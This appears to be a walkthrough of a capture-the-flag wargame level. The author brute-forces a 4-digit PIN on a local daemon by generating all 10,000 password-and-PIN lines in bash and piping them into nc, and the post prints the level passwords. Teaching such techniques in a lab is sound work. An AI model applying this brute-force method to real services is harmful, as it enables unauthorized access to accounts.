Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
Walkthrough
So we need to write a script again to brute-force this. I only know a bit of bash, but this should be doable. Let's see which command we need to execute and how this works. Let's try the format: nc localhost port password pin
It asks for the pin after the connection. Okay. Let's try to echo the password and pin and pipe this into nc and see what it does. This works: we get a "please enter the correct pincode" back. We can use this in our script, but we need a list of all the possible combinations.
So I googled how to make a for loop to generate the 4-digit pincode and came up with this:
#!/bin/bash
# password for bandit24, followed by every zero-padded pin from 0000 to 9999
password24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
for i in {0000..9999}
do
    echo "$password24 $i" >> passlist.txt
done
This generated the passlist.txt with the password and 0000 for example:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0001
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0002
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0003
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0004
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0005
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0006
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0007
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0008
So now the only thing I need to do is cat this file into nc and let it run? Let's try it.
cat passlist.txt | nc localhost 30002
This goes fast, and it runs! We got the password, but have no idea which pincode was entered. The password: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG